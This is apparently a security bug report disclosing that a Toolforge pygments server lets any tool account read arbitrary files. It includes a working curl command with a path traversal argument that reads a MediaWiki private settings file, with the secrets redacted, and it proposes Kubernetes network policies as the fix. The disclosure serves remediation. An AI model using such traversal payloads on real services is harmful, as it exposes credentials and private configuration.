The notwikilambda pygments server set up in T283754: Request increased quota for notwikilambda Toolforge tool allows any Toolforge tool account to read any file as tools.notwikilambda:
[tools.majavah-bot@tools-sgebastion-08 ~] $ webservice shell [tools.majavah-bot@interactive ~] $ curl -X POST http://pygments-server.tool-notwikilambda.svc:7879?args=..%2F..%2F..%2Fpublic_html%2Fw%2FPrivateSettings.php <?php # This file contains the MediaWiki settings that should not be public. # (It is manually edited.) [... actual secrets removed...]
The fix here is to use Kubernetes network policies to limit incoming traffic to the pygments server service.